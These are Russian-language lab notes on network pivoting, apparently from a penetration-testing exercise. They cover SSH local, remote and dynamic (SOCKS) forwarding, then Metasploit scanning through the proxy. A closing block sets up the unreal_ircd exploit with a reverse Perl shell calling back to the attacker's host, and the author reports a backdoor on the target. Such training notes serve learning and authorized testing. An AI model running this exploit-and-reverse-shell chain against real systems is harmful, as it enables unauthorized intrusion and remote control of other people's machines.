###### tags: `Pivoting`
# Пивотинг



## SSH

kali:
ssh -L 8080:10.0.0.2:80 test@10.0.2.15
Это значит что через test@10.0.2.15 у нас будет перенаправляться с 10.0.0.2:80 на наш локальный хост на порт 8080

## SSH remote port forwardng

На промежуточной машине (.15) открываем настройку /etc/ssh/sshd_config под рутом:
в конец добавляем `GatewayPorts yes`
Проверяем на наличие ошибок `sshd -t`
`service ssh restart`
`ssh -R 4444:0.0.0.0:4444 test@10.0.2.15`
Перенаправляем на нашу кали с промежуточного хоста порт 4444.
Чтобы не писать каждый раз код выше,
Для удобства пропишем все данные в конфиге ~/.ssh/config

Забросим ключи сразу ssh-copy-id linux

Как видим, пробросили 3306 с 10.0.0.2
Вот вариант, с которого мы получили соединение до удаленной машины с нашей кали:

Откроем socks-proxy сервер на порту 5555 на linux:
`ssh -D 5555 linux`
msfconsole: use post/multi/manage/sudo
search auxiliary/scanner/http/http_version

`set Proxies socks5:127.0.0.1:5555`
Как мы видим, мы теперь просканили удаленную машину:

На удаленной машине у нас висит через ncat 4444 порт,
на промежуточной у нас открыт редирект с 4444 на нашу кали + открыт socks5 прокси.
msfconsole:
```
search unreal_ircd
set rhost 10.0.0.2
set lhost 10.0.0.1
set lport 4444
set Proxies socks5:127.0.0.1:5555
set payload cmd/unix/reverse_perl
set verbose true
set ReverseAllowProxy true
```
Как видим, мы даже смогли удаленно получить бекдор:

